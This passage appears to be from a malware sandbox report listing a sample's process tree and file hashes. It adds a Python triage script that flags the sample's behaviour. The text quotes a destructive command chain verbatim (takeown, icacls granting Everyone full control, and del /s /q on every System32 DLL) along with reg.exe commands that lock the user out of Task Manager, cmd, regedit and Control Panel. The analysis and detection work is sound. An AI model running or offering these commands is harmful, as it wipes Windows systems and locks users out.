"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\mspaint.exe

"C:\Windows\System32\mspaint.exe"

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\System32\notepad.exe

"C:\Windows\System32\notepad.exe" note.txt

C:\Windows\system32\icacls.exe

icacls c:\windows\system32\*.dll /grant Everyone:(F)
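
The process list above is the whole story of this sample: six reg.exe adds that lock the interactive user out of Task Manager, cmd.exe, regedit, the Run box, Control Panel and Shut Down, one cmd.exe chain that takes ownership of every DLL in System32, grants Everyone full control and deletes them, and dozens of mspaint.exe / notepad.exe launches. The triage script below is an added example, not part of the sandbox report or of the sample. It rebuilds those command lines as Sysmon-style process-creation events (constructed from the Processes and WriteProcessMemory sections) and runs three rules over them: a parser for `reg add` that matches the policy writes, a splitter for cmd.exe `&&` chains that recognises takeown/icacls/del aimed under System32, and a per-parent spawn counter. The rule names, the spawn threshold of 10, the placeholder PID 9001 for icacls.exe and the pairing of each reg.exe PID with a command in list order are this example's assumptions.

```python
"""Triage helper for the behavioral2 process tree above (added example, not the
report's tooling).  Takes process-creation events (pid, ppid, image, command line),
as a Sysmon Event ID 1 / Security 4688 feed carries them, and flags what the Processes
section documents: the HKCU lockout policies, the takeown/icacls/del chain against
C:\\Windows\\System32\\*.dll, and one parent mass-spawning mspaint.exe / notepad.exe."""
import ntpath
import re
from collections import Counter, namedtuple

# (subkey below the hive, value name) -> effect; reg.exe sets all six to 1.
LOCKOUT_POLICIES = {
    (r"software\microsoft\windows\currentversion\policies\system", "disabletaskmgr"): "Task Manager disabled",
    (r"software\microsoft\windows\currentversion\policies\system", "disablecmd"): "cmd.exe disabled",
    (r"software\microsoft\windows\currentversion\policies\system", "disableregistrytools"): "regedit disabled",
    (r"software\microsoft\windows\currentversion\policies\explorer", "norun"): "Run dialog removed",
    (r"software\microsoft\windows\currentversion\policies\explorer", "noclose"): "Shut Down removed",
    (r"software\microsoft\windows\currentversion\policies\explorer", "nocontrolpanel"): "Control Panel blocked",
}
ACL_TOOLS = {"takeown": "takeown", "takeown.exe": "takeown", "icacls": "icacls",
             "icacls.exe": "icacls", "del": "del", "erase": "del"}
SYSTEM32 = re.compile(r"^[a-z]:\\windows\\system32\\", re.IGNORECASE)
Finding = namedtuple("Finding", "pid rule detail")


def parse_reg_add(cmdline):
    """(hive, subkey, value name, data) for a `reg add` command line, else None."""
    toks = cmdline.replace('"', "").split()
    if len(toks) < 3 or ntpath.basename(toks[0]).lower() not in ("reg", "reg.exe") or toks[1].lower() != "add":
        return None
    hive, _, subkey = toks[2].partition("\\")
    opts, i = {}, 3
    while i < len(toks):
        if toks[i].lower() in ("/v", "/t", "/d") and i + 1 < len(toks):
            opts[toks[i].lower()], i = toks[i + 1], i + 2
        else:
            i += 1  # /f, /ve, /reg:64 take no argument
    return hive.upper(), subkey.lower().rstrip("\\"), opts.get("/v", "").lower(), opts.get("/d")


def system32_steps(cmdline):
    """Ordered (tool, target) pairs for takeown/icacls/del aimed under System32."""
    steps = []
    for segment in cmdline.split("&&"):  # inspect each step of a cmd.exe chain on its own
        toks = segment.replace('"', "").split()
        for i, tok in enumerate(toks):
            tool = ACL_TOOLS.get(ntpath.basename(tok).lower())
            if tool:
                target = next((a for a in toks[i + 1:] if SYSTEM32.match(a)), None)
                if target:
                    steps.append((tool, target))
                break
    return steps


def analyse(pid, cmdline):
    """Per-event rules: lockout-policy writes and System32 ACL tampering."""
    findings = []
    if reg := parse_reg_add(cmdline):
        hive, subkey, value, data = reg
        effect = LOCKOUT_POLICIES.get((subkey, value))
        if effect and data == "1":
            findings.append(Finding(pid, "user_lockout_policy", f"{hive} {value}=1: {effect}"))
    if steps := system32_steps(cmdline):
        full = {"takeown", "icacls", "del"} <= {tool for tool, _ in steps}
        rule = "system32_wiper_chain" if full else "system32_acl_tamper"
        findings.append(Finding(pid, rule, " -> ".join(f"{t} {p}" for t, p in steps)))
    return findings


def analyse_tree(events):
    """analyse() every event, then flag parents that mass-spawn one image."""
    findings = [f for pid, _, _, cmd in events for f in analyse(pid, cmd)]
    spawned = Counter((ppid, ntpath.basename(image).lower()) for _, ppid, image, _ in events)
    for (ppid, image), n in spawned.items():
        if n >= 10:  # threshold is this example's choice
            findings.append(Finding(ppid, "child_process_spam", f"{n} x {image}"))
    return findings


# Constructed from the report's Processes and WriteProcessMemory sections.  PIDs are the
# report's where given; 9001 for icacls.exe is a placeholder, and each reg.exe PID is
# paired with its command in list order (assumed).
CMD, REG = r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\reg.exe"
PAINT, NOTE = r"C:\Windows\System32\mspaint.exe", r"C:\Windows\System32\notepad.exe"
POL = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Policies"
EVENTS = [
    (712, 1020, CMD, rf'"{CMD}" /k takeown /f c:\windows\system32\*.dll && icacls '
                     r"c:\windows\system32\*.dll /grant Everyone:(F) && del /s /q c:\windows\system32\*.dll && exit"),
    (4236, 1020, REG, rf'"{REG}" add {POL}\System /v DisableTaskMgr /t REG_DWORD /d 1 /f'),
    (4688, 1020, REG, rf'"{REG}" add {POL}\System /v DisableCMD /t REG_DWORD /d 1 /f'),
    (2256, 1020, REG, rf'"{REG}" add {POL}\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f'),
    (2024, 1020, REG, rf'"{REG}" add {POL}\Explorer /v NoClose /t REG_DWORD /d 1 /f'),
    (3604, 1020, REG, rf'"{REG}" add {POL}\Explorer /v NoRun /t REG_DWORD /d 1 /f'),
    (4952, 1020, REG, rf'"{REG}" add {POL}\System /v DisableRegistryTools /t REG_DWORD /d 1 /f'),
    (1148, 712, r"C:\Windows\system32\takeown.exe", r"takeown /f c:\windows\system32\*.dll"),
    (9001, 712, r"C:\Windows\system32\icacls.exe", r"icacls c:\windows\system32\*.dll /grant Everyone:(F)"),
] + [(p, 1020, PAINT, f'"{PAINT}"') for p in
     (2068, 4936, 3492, 1584, 3436, 3196, 416, 5080, 4872, 2172, 3592, 1160, 1372)] \
  + [(p, 1020, NOTE, f'"{NOTE}" note.txt') for p in
     (2584, 1328, 2128, 2532, 4908, 3900, 1324, 4988, 1808, 3348, 3972)]

if __name__ == "__main__":
    for f in analyse_tree(EVENTS):
        print(f"pid {f.pid:<5} {f.rule:<22} {f.detail}")
```

Two points worth keeping in mind when reading the findings. The System32 chain only works from an elevated token: takeown.exe has to enable SeTakeOwnershipPrivilege (the AdjustPrivilegeToken signature above records exactly that), and a standard user or a UAC-filtered admin token cannot enable it, so on an unelevated host the lockout policies land while the DLL deletion fails. The policies themselves live under HKCU, so they are per-user, need no elevation, and can be reverted with `reg delete` on the same six key/value pairs once the user regains a console (for example through a different account or an elevated PowerShell, since DisableCMD blocks cmd.exe for that user).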

Network

N/A

Files

memory/1020-0-0x00007FF71A460000-0x00007FF71A600000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\note.txt

MD5 78551eabd7131c45b744a0cf420d29f7
SHA1 0f6792d1f3339ab5ac7674ad46267049ec9eb2b7
SHA256 9904338a1a2758f5969ba2affe5c46beaac955b6c4b87c67d20063ef5e0602f8
SHA512 abee3d1cd3860afe799deaac6e2c45fb741504ff80eb9fc7f39705cd7a9d46f61cee13cea6e676a33ea566f9256e13fa62dac7156b376ff94a7ced742516c064

C:\Windows\Debug\WIA\wiatrace.log

MD5 7cd1509dbe8e73417ff92bfd04320e3c
SHA1 4fca74c3d6377e8ffd14ab34b35082efb1209ef9
SHA256 8575cd2eaebea2f499228b1aba714bc5fa7427cd036f6bcf074dbb9fc9d085ad
SHA512 852cd692e36e2853c02c707b8769a89ae3d83ba60e039f0fff39558386d9e2cc5fa579bfeda850a7a8a01ba4c5548f646521b11ff988b3e3e62c8604e099bdb7

C:\Windows\Debug\WIA\wiatrace.log

MD5 dab78d7a19962adb8452777d6fcad53a
SHA1 04313c5d439e17082680973434a1f075775c9d0b
memory/1020-35-0x00007FF71A460000-0x00007FF71A600000-memory.dmp